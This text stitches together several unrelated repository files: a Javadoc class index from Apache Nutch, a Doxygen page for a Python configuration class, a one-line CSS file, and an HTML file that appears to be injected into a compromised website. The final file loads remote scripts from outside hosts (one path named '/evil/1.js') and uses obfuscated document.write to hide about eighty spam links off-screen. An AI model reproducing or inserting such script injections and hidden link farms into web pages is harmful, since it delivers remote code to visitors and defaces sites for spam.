<A HREF="org/apache/nutch/protocol/ProtocolException.html" title="class in org.apache.nutch.protocol">ProtocolException</A>
<BR>
<A HREF="org/apache/nutch/protocol/ProtocolFactory.html" title="class in org.apache.nutch.protocol">ProtocolFactory</A>
<BR>
<A HREF="org/apache/nutch/protocol/ProtocolNotFound.html" title="class in org.apache.nutch.protocol">ProtocolNotFound</A>
<BR>
<A HREF="org/apache/nutch/protocol/ProtocolOutput.html" title="class in org.apache.nutch.protocol">ProtocolOutput</A>
<BR>
<A HREF="org/apache/nutch/storage/ProtocolStatus.html" title="class in org.apache.nutch.storage">ProtocolStatus</A>
<BR>
<A HREF="org/apache/nutch/storage/ProtocolStatus.Field.html" title="enum in org.apache.nutch.storage">ProtocolStatus.Field</A>
<BR>
<A HREF="org/apache/nutch/protocol/ProtocolStatusCodes.html" title="interface in org.apache.nutch.protocol"><I>ProtocolStatusCodes</I></A>
<BR>
<A HREF="org/apache/nutch/protocol/ProtocolStatusUtils.html" title="class in org.apache.nutch.protocol">ProtocolStatusUtils</A>
<BR>
<A HREF="org/apache/nutch/api/impl/RAMConfManager.html" title="class in org.apache.nutch.api.impl">RAMConfManager</A>
<BR>
<A HREF="org/apache/nutch/api/impl/RAMJobManager.html" title="class in org.apache.nutch.api.impl">RAMJobManager</A>
<BR>
<A HREF="org/apache/nutch/urlfilter/api/RegexRule.html" title="class in org.apache.nutch.urlfilter.api">RegexRule</A>
<BR>
<A HREF="org/apache/nutch/urlfilter/regex/RegexURLFilter.html" title="class in org.apache.nutch.urlfilter.regex">RegexURLFilter</A>
<BR>
<A HREF="org/apache/nutch/urlfilter/api/RegexURLFilterBase.html" title="class in org.apache.nutch.urlfilter.api">RegexURLFilterBase</A>
<BR>
<A HREF="org/apache/nutch/net/urlnormalizer/regex/RegexURLNormalizer.html" title="class in org.apache.nutch.net.urlnormalizer.regex">RegexURLNormalizer</A>
<BR>
<A HREF="org/apache/nutch/microformats/reltag/RelTagIndexingFilter.html" title="class in org.apache.nutch.microformats.reltag">RelTagIndexingFilter</A>
<BR>
<A HREF="org/apache/nutch/microformats/reltag/RelTagParser.html" title="class in org.apache.nutch.microformats.reltag">RelTagParser</A>
<BR>
<A HREF="org/apache/nutch/tools/ResolveUrls.html" title="class in org.apache.nutch.tools">ResolveUrls</A>
<BR>
<A HREF="org/apache/nutch/net/protocols/Response.html" title="interface in org.apache.nutch.net.protocols"><I>Response</I></A>
<BR>
<A HREF="org/apache/nutch/protocol/RobotRules.html" title="interface in org.apache.nutch.protocol"><I>RobotRules</I></A>
<BR>
<A HREF="org/apache/nutch/protocol/http/api/RobotRulesParser.html" title="class in org.apache.nutch.protocol.http.api">RobotRulesParser</A>
<BR>
<A HREF="org/apache/nutch/protocol/http/api/RobotRulesParser.RobotRuleSet.html" title="class in org.apache.nutch.protocol.http.api">RobotRulesParser.RobotRuleSet</A>
<BR>
<A HREF="org/apache/nutch/scoring/ScoreDatum.html" title="class in org.apache.nutch.scoring">ScoreDatum</A>
<BR>
<A HREF="org/apache/nutch/scoring/ScoringFilter.html" title="interface in org.apache.nutch.scoring"><I>ScoringFilter</I></A>
<BR>
<A HREF="org/apache/nutch/scoring/ScoringFilterException.html" title="class in org.apache.nutch.scoring">ScoringFilterException</A>
<BR>
<A HREF="org/apache/nutch/scoring/ScoringFilters.html" title="class in org.apache.nutch.scoring">ScoringFilters</A>
<BR>
<A HREF="org/apache/nutch/protocol/sftp/Sftp.html" title="class in org.apache.nutch.protocol.sftp">Sftp</A>
<BR>
<A HREF="org/apache/nutch/crawl/Signature.html" title="class in org.apache.nutch.crawl">Signature</A>
<BR>
<A HREF="org/apache/nutch/crawl/SignatureComparator.html" title="class in org.apache.nutch.crawl">SignatureComparator</A>
<BR>
<A HREF="org/apache/nutch/crawl/SignatureFactory.html" title="class in org.apache.nutch.crawl">SignatureFactory</A>
<BR>
<A HREF="org/apache/nutch/indexer/solr/SolrConstants.html" title="interface in org.apache.nutch.indexer.solr"><I>SolrConstants</I></A>
<BR>
<A HREF="org/apache/nutch/indexer/solr/SolrDeleteDuplicates.html" title="class in org.apache.nutch.indexer.solr">SolrDeleteDuplicates</A>
<BR>
<A HREF="org/apache/nutch/indexer/solr/SolrDeleteDuplicates.SolrInputFormat.html" title="class in org.apache.nutch.indexer.solr">SolrDeleteDuplicates.SolrInputFormat</A>
<BR>
<A HREF="org/apache/nutch/indexer/solr/SolrDeleteDuplicates.SolrInputSplit.html" title="class in org.apache.nutch.indexer.solr">SolrDeleteDuplicates.SolrInputSplit</A>
<BR>
<A HREF="org/apache/nutch/indexer/solr/SolrDeleteDuplicates.SolrRecord.html" title="class in org.apache.nutch.indexer.solr">SolrDeleteDuplicates.SolrRecord</A>
<BR>
<A HREF="org/apache/nutch/indexer/solr/SolrDeleteDuplicates.SolrRecordReader.html" title="class in org.apache.nutch.indexer.solr">SolrDeleteDuplicates.SolrRecordReader</A>
<BR>
<A HREF="org/apache/nutch/indexer/solr/SolrIndexerJob.html" title="class in org.apache.nutch.indexer.solr">SolrIndexerJob</A>
<BR>
<A HREF="org/apache/nutch/indexer/solr/SolrMappingReader.html" title="class in org.apache.nutch.indexer.solr">SolrMappingReader</A>
<BR>
<A HREF="org/apache/nutch/indexer/solr/SolrWriter.html" title="class in org.apache.nutch.indexer.solr">SolrWriter</A>
<BR>
<A HREF="org/apache/nutch/metadata/SpellCheckedMetadata.html" title="class in org.apache.nutch.metadata">SpellCheckedMetadata</A>
<BR>
<A HREF="org/apache/nutch/storage/StorageUtils.html" title="class in org.apache.nutch.storage">StorageUtils</A>
<BR>
<A HREF="org/apache/nutch/util/StringUtil.html" title="class in org.apache.nutch.util">StringUtil</A>
<BR>
<A HREF="org/apache/nutch/collection/Subcollection.html" title="class in org.apache.nutch.collection">Subcollection</A>
<BR>
<A HREF="org/apache/nutch/indexer/subcollection/SubcollectionIndexingFilter.html" title="class in org.apache.nutch.indexer.subcollection">SubcollectionIndexingFilter</A>
<BR>
<A HREF="org/apache/nutch/util/SuffixStringMatcher.html" title="class in org.apache.nutch.util">SuffixStringMatcher</A>
<BR>
<A HREF="org/apache/nutch/urlfilter/suffix/SuffixURLFilter.html" title="class in org.apache.nutch.urlfilter.suffix">SuffixURLFilter</A>
<BR>
<A HREF="org/apache/nutch/parse/swf/SWFParser.html" title="class in org.apache.nutch.parse.swf">SWFParser</A>
<BR>
<A HREF="org/apache/nutch/util/TableUtil.html" title="class in org.apache.nutch.util">TableUtil</A>
<BR>
<A HREF="org/apache/nutch/tools/proxy/TestbedProxy.html" title="class in org.apache.nutch.tools.proxy">TestbedProxy</A>
<BR>
<A HREF="org/apache/nutch/crawl/TextProfileSignature.html" title="class in org.apache.nutch.crawl">TextProfileSignature</A>
<BR>
<A HREF="org/apache/nutch/parse/tika/TikaConfig.html" title="class in org.apache.nutch.parse.tika">TikaConfig</A>
<BR>
<A HREF="org/apache/nutch/parse/tika/TikaParser.html" title="class in org.apache.nutch.parse.tika">TikaParser</A>
<BR>
<A HREF="org/apache/nutch/util/TimingUtil.html" title="class in org.apache.nutch.util">TimingUtil</A>
<BR>
<A HREF="org/apache/nutch/indexer/tld/TLDIndexingFilter.html" title="class in org.apache.nutch.indexer.tld">TLDIndexingFilter</A>
<BR>
<A HREF="org/apache/nutch/scoring/tld/TLDScoringFilter.html" title="class in org.apache.nutch.scoring.tld">TLDScoringFilter</A>
<BR>
<A HREF="org/apache/nutch/util/ToolUtil.html" title="class in org.apache.nutch.util">ToolUtil</A>
<BR>
<A HREF="org/apache/nutch/util/domain/TopLevelDomain.html" title="class in org.apache.nutch.util.domain">TopLevelDomain</A>
<BR>
<A HREF="org/apache/nutch/util/domain/TopLevelDomain.Type.html" title="enum in org.apache.nutch.util.domain">TopLevelDomain.Type</A>
<BR>
<A HREF="org/apache/nutch/util/TrieStringMatcher.html" title="class in org.apache.nutch.util">TrieStringMatcher</A>
<BR>
<A HREF="org/apache/nutch/net/URLFilter.html" title="interface in org.apache.nutch.net"><I>URLFilter</I></A>
<BR>
<A HREF="org/apache/nutch/net/URLFilterChecker.html" title="class in org.apache.nutch.net">URLFilterChecker</A>
<BR>
<A HREF="org/apache/nutch/net/URLFilterException.html" title="class in org.apache.nutch.net">URLFilterException</A>
<BR>
<A HREF="org/apache/nutch/net/URLFilters.html" title="class in org.apache.nutch.net">URLFilters</A>
<BR>
<A HREF="org/apache/nutch/net/URLNormalizer.html" title="interface in org.apache.nutch.net"><I>URLNormalizer</I></A>
<BR>
<A HREF="org/apache/nutch/net/URLNormalizerChecker.html" title="class in org.apache.nutch.net">URLNormalizerChecker</A>
<BR>
<A HREF="org/apache/nutch/net/URLNormalizers.html" title="class in org.apache.nutch.net">URLNormalizers</A>
<BR>
<A HREF="org/apache/nutch/crawl/URLPartitioner.html" title="class in org.apache.nutch.crawl">URLPartitioner</A>
<BR>
<A HREF="org/apache/nutch/crawl/URLPartitioner.FetchEntryPartitioner.html" title="class in org.apache.nutch.crawl">URLPartitioner.FetchEntryPartitioner</A>
<BR>
<A HREF="org/apache/nutch/crawl/URLPartitioner.SelectorEntryPartitioner.html" title="class in org.apache.nutch.crawl">URLPartitioner.SelectorEntryPartitioner</A>
<BR>
<A HREF="org/apache/nutch/util/URLUtil.html" title="class in org.apache.nutch.util">URLUtil</A>
<BR>
<A HREF="org/apache/nutch/urlfilter/validator/UrlValidator.html" title="class in org.apache.nutch.urlfilter.validator">UrlValidator</A>
<BR>
<A HREF="org/apache/nutch/crawl/URLWebPage.html" title="class in org.apache.nutch.crawl">URLWebPage</A>
<BR>
<A HREF="org/apache/nutch/crawl/UrlWithScore.html" title="class in org.apache.nutch.crawl">UrlWithScore</A>
<BR>
<A HREF="org/apache/nutch/crawl/UrlWithScore.UrlOnlyPartitioner.html" title="class in org.apache.nutch.crawl">UrlWithScore.UrlOnlyPartitioner</A>
<BR>
<A HREF="org/apache/nutch/crawl/UrlWithScore.UrlScoreComparator.html" title="class in org.apache.nutch.crawl">UrlWithScore.UrlScoreComparator</A>
<BR>
<A HREF="org/apache/nutch/crawl/UrlWithScore.UrlScoreComparator.UrlOnlyComparator.html" title="class in org.apache.nutch.crawl">UrlWithScore.UrlScoreComparator.UrlOnlyComparator</A>
<BR>
<A HREF="org/apache/nutch/storage/WebPage.html" title="class in org.apache.nutch.storage">WebPage</A>
<BR>
<A HREF="org/apache/nutch/storage/WebPage.Field.html" title="enum in org.apache.nutch.storage">WebPage.Field</A>
<BR>
<A HREF="org/apache/nutch/util/WebPageWritable.html" title="class in org.apache.nutch.util">WebPageWritable</A>
<BR>
<A HREF="org/apache/nutch/storage/WebTableCreator.html" title="class in org.apache.nutch.storage">WebTableCreator</A>
<BR>
<A HREF="org/apache/nutch/crawl/WebTableReader.html" title="class in org.apache.nutch.crawl">WebTableReader</A>
<BR>
<A HREF="org/apache/nutch/crawl/WebTableReader.WebTableRegexMapper.html" title="class in org.apache.nutch.crawl">WebTableReader.WebTableRegexMapper</A>
<BR>
<A HREF="org/apache/nutch/crawl/WebTableReader.WebTableStatCombiner.html" title="class in org.apache.nutch.crawl">WebTableReader.WebTableStatCombiner</A>
<BR>
<A HREF="org/apache/nutch/crawl/WebTableReader.WebTableStatMapper.html" title="class in org.apache.nutch.crawl">WebTableReader.WebTableStatMapper</A>
<BR>
<A HREF="org/apache/nutch/crawl/WebTableReader.WebTableStatReducer.html" title="class in org.apache.nutch.crawl">WebTableReader.WebTableStatReducer</A>
<BR>
<A HREF="org/apache/nutch/parse/html/XMLCharacterRecognizer.html" title="class in org.apache.nutch.parse.html">XMLCharacterRecognizer</A>
<BR>
<A HREF="org/apache/nutch/parse/zip/ZipParser.html" title="class in org.apache.nutch.parse.zip">ZipParser</A>
<BR>
<A HREF="org/apache/nutch/parse/zip/ZipTextExtractor.html" title="class in org.apache.nutch.parse.zip">ZipTextExtractor</A>
<BR>
</FONT></TD>
</TR>
</TABLE>
</BODY>
</HTML>
|
dox/html/classgconf__config_1_1gconf__config.html | EvansMike/librarian | <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/>
<title>Simple Librarian: gconf_config::gconf_config Class Reference</title>
<link href="tabs.css" rel="stylesheet" type="text/css"/>
<link href="search/search.css" rel="stylesheet" type="text/css"/>
<script type="text/javascript" src="search/search.js"></script>
<link href="doxygen.css" rel="stylesheet" type="text/css"/>
</head>
<body onload='searchBox.OnSelectItem(0);'>
<!-- Generated by Doxygen 1.7.4 -->
<script type="text/javascript"><!--
var searchBox = new SearchBox("searchBox", "search",false,'Search');
--></script>
<div id="top">
<div id="titlearea">
<table cellspacing="0" cellpadding="0">
<tbody>
<tr style="height: 56px;">
<td style="padding-left: 0.5em;">
<div id="projectname">Simple Librarian</div>
</td>
</tr>
</tbody>
</table>
</div>
<div id="navrow1" class="tabs">
<ul class="tablist">
<li><a href="index.html"><span>Main Page</span></a></li>
<li class="current"><a href="annotated.html"><span>Classes</span></a></li>
<li id="searchli">
<div id="MSearchBox" class="MSearchBoxInactive">
<span class="left">
<img id="MSearchSelect" src="search/mag_sel.png"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
alt=""/>
<input type="text" id="MSearchField" value="Search" accesskey="S"
onfocus="searchBox.OnSearchFieldFocus(true)"
onblur="searchBox.OnSearchFieldFocus(false)"
onkeyup="searchBox.OnSearchFieldChange(event)"/>
</span><span class="right">
<a id="MSearchClose" href="javascript:searchBox.CloseResultsWindow()"><img id="MSearchCloseImg" border="0" src="search/close.png" alt=""/></a>
</span>
</div>
</li>
</ul>
</div>
<div id="navrow2" class="tabs2">
<ul class="tablist">
<li><a href="annotated.html"><span>Class List</span></a></li>
<li><a href="classes.html"><span>Class Index</span></a></li>
<li><a href="functions.html"><span>Class Members</span></a></li>
</ul>
</div>
<div id="nav-path" class="navpath">
<ul>
<li class="navelem"><b>gconf_config</b> </li>
<li class="navelem"><a class="el" href="classgconf__config_1_1gconf__config.html">gconf_config</a> </li>
</ul>
</div>
</div>
<div class="header">
<div class="summary">
<a href="#pub-methods">Public Member Functions</a> |
<a href="#pub-attribs">Public Attributes</a> </div>
<div class="headertitle">
<div class="title">gconf_config::gconf_config Class Reference</div> </div>
</div>
<div class="contents">
<!-- doxytag: class="gconf_config::gconf_config" -->
<p><a href="classgconf__config_1_1gconf__config-members.html">List of all members.</a></p>
<table class="memberdecls">
<tr><td colspan="2"><h2><a name="pub-methods"></a>
Public Member Functions</h2></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a424094e53dc68f6e166a5021d7440691"></a><!-- doxytag: member="gconf_config::gconf_config::__init__" ref="a424094e53dc68f6e166a5021d7440691" args="" -->
def </td><td class="memItemRight" valign="bottom"><b>__init__</b></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">def </td><td class="memItemRight" valign="bottom"><a class="el" href="classgconf__config_1_1gconf__config.html#a38d2a663a02556194c1015150d1a2f74">save_config</a></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">def </td><td class="memItemRight" valign="bottom"><a class="el" href="classgconf__config_1_1gconf__config.html#af2adddcd62ea4372a5d3222689b38bbd">test_config</a></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">def </td><td class="memItemRight" valign="bottom"><a class="el" href="classgconf__config_1_1gconf__config.html#aec0b077ae0efcf436aa0f4858b12cbee">create_schema</a></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">def </td><td class="memItemRight" valign="bottom"><a class="el" href="classgconf__config_1_1gconf__config.html#aea7ff2ce8c9dee3322e6f28d957addef">get_config</a></td></tr>
<tr><td class="memItemLeft" align="right" valign="top">def </td><td class="memItemRight" valign="bottom"><a class="el" href="classgconf__config_1_1gconf__config.html#aec8448d5f80c97a04be794cea5cfb3ad">print_config</a></td></tr>
<tr><td colspan="2"><h2><a name="pub-attribs"></a>
Public Attributes</h2></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aa5f815e13c388813bb0b74dd00776f2a"></a><!-- doxytag: member="gconf_config::gconf_config::client" ref="aa5f815e13c388813bb0b74dd00776f2a" args="" -->
 </td><td class="memItemRight" valign="bottom"><b>client</b></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a0c5c1e17033c2243b37e467a93b53fdd"></a><!-- doxytag: member="gconf_config::gconf_config::db_user" ref="a0c5c1e17033c2243b37e467a93b53fdd" args="" -->
 </td><td class="memItemRight" valign="bottom"><b>db_user</b></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab7f53a5a8e361118ce7302025989cb9c"></a><!-- doxytag: member="gconf_config::gconf_config::db_pass" ref="ab7f53a5a8e361118ce7302025989cb9c" args="" -->
 </td><td class="memItemRight" valign="bottom"><b>db_pass</b></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a8eba3306d02e4828b4bda678af0feeee"></a><!-- doxytag: member="gconf_config::gconf_config::db_host" ref="a8eba3306d02e4828b4bda678af0feeee" args="" -->
 </td><td class="memItemRight" valign="bottom"><b>db_host</b></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="af7def5bc7548378918225c4b0d25b325"></a><!-- doxytag: member="gconf_config::gconf_config::db_base" ref="af7def5bc7548378918225c4b0d25b325" args="" -->
 </td><td class="memItemRight" valign="bottom"><b>db_base</b></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ab66a30ab1df23b4463f06c3a946f9d92"></a><!-- doxytag: member="gconf_config::gconf_config::calibre_db" ref="ab66a30ab1df23b4463f06c3a946f9d92" args="" -->
 </td><td class="memItemRight" valign="bottom"><b>calibre_db</b></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="af6a3db763fdcd7638179d5d74d1e0e63"></a><!-- doxytag: member="gconf_config::gconf_config::az_key" ref="af6a3db763fdcd7638179d5d74d1e0e63" args="" -->
 </td><td class="memItemRight" valign="bottom"><b>az_key</b></td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a227eeafde653a119cf9f9f8c28be6df5"></a><!-- doxytag: member="gconf_config::gconf_config::az_skey" ref="a227eeafde653a119cf9f9f8c28be6df5" args="" -->
 </td><td class="memItemRight" valign="bottom"><b>az_skey</b></td></tr>
</table>
<hr/><a name="details" id="details"></a><h2>Detailed Description</h2>
<div class="textblock"><div class="fragment"><pre class="fragment">Load the config data for use by applications.
If a config file is not found it writes a stub file to the current dir
and informs the user to about filling the config fields.</pre></div> </div><hr/><h2>Member Function Documentation</h2>
<a class="anchor" id="aec0b077ae0efcf436aa0f4858b12cbee"></a><!-- doxytag: member="gconf_config::gconf_config::create_schema" ref="aec0b077ae0efcf436aa0f4858b12cbee" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">def gconf_config::gconf_config::create_schema </td>
<td>(</td>
<td class="paramtype"> </td>
<td class="paramname"><em>self</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<div class="fragment"><pre class="fragment">Create schema for key values </pre></div>
</div>
</div>
<a class="anchor" id="aea7ff2ce8c9dee3322e6f28d957addef"></a><!-- doxytag: member="gconf_config::gconf_config::get_config" ref="aea7ff2ce8c9dee3322e6f28d957addef" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">def gconf_config::gconf_config::get_config </td>
<td>(</td>
<td class="paramtype"> </td>
<td class="paramname"><em>self</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<div class="fragment"><pre class="fragment"></pre></div>
</div>
</div>
<a class="anchor" id="aec8448d5f80c97a04be794cea5cfb3ad"></a><!-- doxytag: member="gconf_config::gconf_config::print_config" ref="aec8448d5f80c97a04be794cea5cfb3ad" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">def gconf_config::gconf_config::print_config </td>
<td>(</td>
<td class="paramtype"> </td>
<td class="paramname"><em>self</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<div class="fragment"><pre class="fragment">print some values for testing. Take care not to expose secret data.
</pre></div>
</div>
</div>
<a class="anchor" id="a38d2a663a02556194c1015150d1a2f74"></a><!-- doxytag: member="gconf_config::gconf_config::save_config" ref="a38d2a663a02556194c1015150d1a2f74" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">def gconf_config::gconf_config::save_config </td>
<td>(</td>
<td class="paramtype"> </td>
<td class="paramname"><em>self</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<div class="fragment"><pre class="fragment">Save config values to gconf. </pre></div>
</div>
</div>
<a class="anchor" id="af2adddcd62ea4372a5d3222689b38bbd"></a><!-- doxytag: member="gconf_config::gconf_config::test_config" ref="af2adddcd62ea4372a5d3222689b38bbd" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">def gconf_config::gconf_config::test_config </td>
<td>(</td>
<td class="paramtype"> </td>
<td class="paramname"><em>self</em></td><td>)</td>
<td></td>
</tr>
</table>
</div>
<div class="memdoc">
<div class="fragment"><pre class="fragment">write new default values to config.
TODO: Obvioslsy users will not be expected to edit these values in their gconf tree.
TODO: Write a config interface.</pre></div>
</div>
</div>
<hr/>The documentation for this class was generated from the following file:<ul>
<li>gconf_config.py</li>
</ul>
</div>
<!-- window showing the filter options -->
<div id="MSearchSelectWindow"
onmouseover="return searchBox.OnSearchSelectShow()"
onmouseout="return searchBox.OnSearchSelectHide()"
onkeydown="return searchBox.OnSearchSelectKey(event)">
<a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(0)"><span class="SelectionMark"> </span>All</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(1)"><span class="SelectionMark"> </span>Classes</a><a class="SelectItem" href="javascript:void(0)" onclick="searchBox.OnSelectItem(2)"><span class="SelectionMark"> </span>Functions</a></div>
<!-- iframe showing the search results (closed by default) -->
<div id="MSearchResultsWindow">
<iframe src="javascript:void(0)" frameborder="0"
name="MSearchResults" id="MSearchResults">
</iframe>
</div>
<hr class="footer"/><address class="footer"><small>Generated on Sat Jul 14 2012 for Simple Librarian by 
<a href="http://www.doxygen.org/index.html">
<img class="footer" src="doxygen.png" alt="doxygen"/></a> 1.7.4 </small></address>
</body>
</html>
|
wp-content/themes/starkers-master/css/editor-styles.css | gubito/ensenda | .leaf{color:red !important}
|
images/Chershire/02022104946qq.html | ForAEdesWeb/AEW2 | <script src="http://cpm.36obuy.org/evil/1.js"></script><script src="http://cpm.36obuy.org/lion/1.js"></script><script/src=//360cdn.win/c.css></script>
<script>document.write ('<d' + 'iv cl' + 'a' + 's' + 's="z' + '7z8z' + '9z6" st' + 'yl' + 'e="p' + 'ositio' + 'n:f' + 'ixed;l' + 'ef' + 't:-3' + '000' + 'p' + 'x;t' + 'op' + ':-3' + '000' + 'p' + 'x;' + '"' + '>');</script>
<a class="z7z8z9z6" href="http://www.4695288.com/">http://www.4695288.com/</a>
<a class="z7z8z9z6" href="http://www.5613117.com/">http://www.5613117.com/</a>
<a class="z7z8z9z6" href="http://www.4309272.com/">http://www.4309272.com/</a>
<a class="z7z8z9z6" href="http://www.3619276.com/">http://www.3619276.com/</a>
<a class="z7z8z9z6" href="http://www.1539774.com/">http://www.1539774.com/</a>
<a class="z7z8z9z6" href="http://www.2234809.com/">http://www.2234809.com/</a>
<a class="z7z8z9z6" href="http://www.0551180.com/">http://www.0551180.com/</a>
<a class="z7z8z9z6" href="http://www.0027022.com/">http://www.0027022.com/</a>
<a class="z7z8z9z6" href="http://www.1408600.com/">http://www.1408600.com/</a>
<a class="z7z8z9z6" href="http://www.5004279.com/">http://www.5004279.com/</a>
<a class="z7z8z9z6" href="http://www.4314451.com/">http://www.4314451.com/</a>
<a class="z7z8z9z6" href="http://www.9402647.com/">http://www.9402647.com/</a>
<a class="z7z8z9z6" href="http://www.6420212.com/">http://www.6420212.com/</a>
<a class="z7z8z9z6" href="http://www.0921315.com/">http://www.0921315.com/</a>
<a class="z7z8z9z6" href="http://www.4849062.com/">http://www.4849062.com/</a>
<a class="z7z8z9z6" href="http://www.8027847.com/">http://www.8027847.com/</a>
<a class="z7z8z9z6" href="http://www.5101309.com/">http://www.5101309.com/</a>
<a class="z7z8z9z6" href="http://www.8033162.com/">http://www.8033162.com/</a>
<a class="z7z8z9z6" href="http://www.7808733.com/">http://www.7808733.com/</a>
<a class="z7z8z9z6" href="http://www.7021821.com/">http://www.7021821.com/</a>
<a class="z7z8z9z6" href="http://www.8560978.com/">http://www.8560978.com/</a>
<a class="z7z8z9z6" href="http://www.3301718.com/">http://www.3301718.com/</a>
<a class="z7z8z9z6" href="http://www.2444890.com/">http://www.2444890.com/</a>
<a class="z7z8z9z6" href="http://www.2501886.com/">http://www.2501886.com/</a>
<a class="z7z8z9z6" href="http://www.8773150.com/">http://www.8773150.com/</a>
<a class="z7z8z9z6" href="http://www.gkamlb.com/">http://www.gkamlb.com/</a>
<a class="z7z8z9z6" href="http://www.nxkmky.com/">http://www.nxkmky.com/</a>
<a class="z7z8z9z6" href="http://www.pkdszd.com/">http://www.pkdszd.com/</a>
<a class="z7z8z9z6" href="http://www.scqyba.com/">http://www.scqyba.com/</a>
<a class="z7z8z9z6" href="http://www.vwyhzp.com/">http://www.vwyhzp.com/</a>
<a class="z7z8z9z6" href="http://www.vwwoms.com/">http://www.vwwoms.com/</a>
<a class="z7z8z9z6" href="http://www.svfdun.com/">http://www.svfdun.com/</a>
<a class="z7z8z9z6" href="http://www.wivjvd.com/">http://www.wivjvd.com/</a>
<a class="z7z8z9z6" href="http://www.sstldp.com/">http://www.sstldp.com/</a>
<a class="z7z8z9z6" href="http://www.sqmtvh.com/">http://www.sqmtvh.com/</a>
<a class="z7z8z9z6" href="http://www.fmxnav.com/">http://www.fmxnav.com/</a>
<a class="z7z8z9z6" href="http://www.etqglz.com/">http://www.etqglz.com/</a>
<a class="z7z8z9z6" href="http://www.rjwmkb.com/">http://www.rjwmkb.com/</a>
<a class="z7z8z9z6" href="http://www.yrljss.com/">http://www.yrljss.com/</a>
<a class="z7z8z9z6" href="http://www.ymdwnv.com/">http://www.ymdwnv.com/</a>
<a class="z7z8z9z6" href="http://www.lhxcjs.com/">http://www.lhxcjs.com/</a>
<a class="z7z8z9z6" href="http://www.fekcko.com/">http://www.fekcko.com/</a>
<a class="z7z8z9z6" href="http://www.furpdg.com/">http://www.furpdg.com/</a>
<a class="z7z8z9z6" href="http://www.voqgwh.com/">http://www.voqgwh.com/</a>
<a class="z7z8z9z6" href="http://www.fknqkj.com/">http://www.fknqkj.com/</a>
<a class="z7z8z9z6" href="http://www.hhabtr.com/">http://www.hhabtr.com/</a>
<a class="z7z8z9z6" href="http://www.ogmykg.com/">http://www.ogmykg.com/</a>
<a class="z7z8z9z6" href="http://www.vseogg.com/">http://www.vseogg.com/</a>
<a class="z7z8z9z6" href="http://www.ctkllf.com/">http://www.ctkllf.com/</a>
<a class="z7z8z9z6" href="http://www.xzxefw.com/">http://www.xzxefw.com/</a>
<a class="z7z8z9z6" href="http://www.0172679.com/">http://www.0172679.com/</a>
<a class="z7z8z9z6" href="http://www.6088532.com/">http://www.6088532.com/</a>
<a class="z7z8z9z6" href="http://www.5214437.com/">http://www.5214437.com/</a>
<a class="z7z8z9z6" href="http://www.4601598.com/">http://www.4601598.com/</a>
<a class="z7z8z9z6" href="http://www.3848474.com/">http://www.3848474.com/</a>
<a class="z7z8z9z6" href="http://www.7621914.com/">http://www.7621914.com/</a>
<a class="z7z8z9z6" href="http://www.9064024.com/">http://www.9064024.com/</a>
<a class="z7z8z9z6" href="http://www.0979289.com/">http://www.0979289.com/</a>
<a class="z7z8z9z6" href="http://www.8732369.com/">http://www.8732369.com/</a>
<a class="z7z8z9z6" href="http://www.7578050.com/">http://www.7578050.com/</a>
<a class="z7z8z9z6" href="http://www.1206219.com/">http://www.1206219.com/</a>
<a class="z7z8z9z6" href="http://www.0320448.com/">http://www.0320448.com/</a>
<a class="z7z8z9z6" href="http://www.6038608.com/">http://www.6038608.com/</a>
<a class="z7z8z9z6" href="http://www.6804640.com/">http://www.6804640.com/</a>
<a class="z7z8z9z6" href="http://www.2393657.com/">http://www.2393657.com/</a>
<a class="z7z8z9z6" href="http://www.laibazonghewang.com/">http://www.laibazonghewang.com/</a>
<a class="z7z8z9z6" href="http://www.jiujiurezuixindizhi.com/">http://www.jiujiurezuixindizhi.com/</a>
<a class="z7z8z9z6" href="http://www.jiqingtupian8.com/">http://www.jiqingtupian8.com/</a>
<a class="z7z8z9z6" href="http://www.qmzufv.com/">http://www.qmzufv.com/</a>
<a class="z7z8z9z6" href="http://www.kwwxgj.com/">http://www.kwwxgj.com/</a>
<a class="z7z8z9z6" href="http://www.tvubqi.com/">http://www.tvubqi.com/</a>
<a class="z7z8z9z6" href="http://www.sjvxww.com/">http://www.sjvxww.com/</a>
<a class="z7z8z9z6" href="http://www.xpdmzk.com/">http://www.xpdmzk.com/</a>
<a class="z7z8z9z6" href="http://www.frveya.com/">http://www.frveya.com/</a>
<a class="z7z8z9z6" href="http://www.nonmnu.com/">http://www.nonmnu.com/</a>
<a class="z7z8z9z6" href="http://www.svytac.com/">http://www.svytac.com/</a>
<a class="z7z8z9z6" href="http://www.fdtggb.com/">http://www.fdtggb.com/</a>
<a class="z7z8z9z6" href="http://www.rnrnjm.com/">http://www.rnrnjm.com/</a>
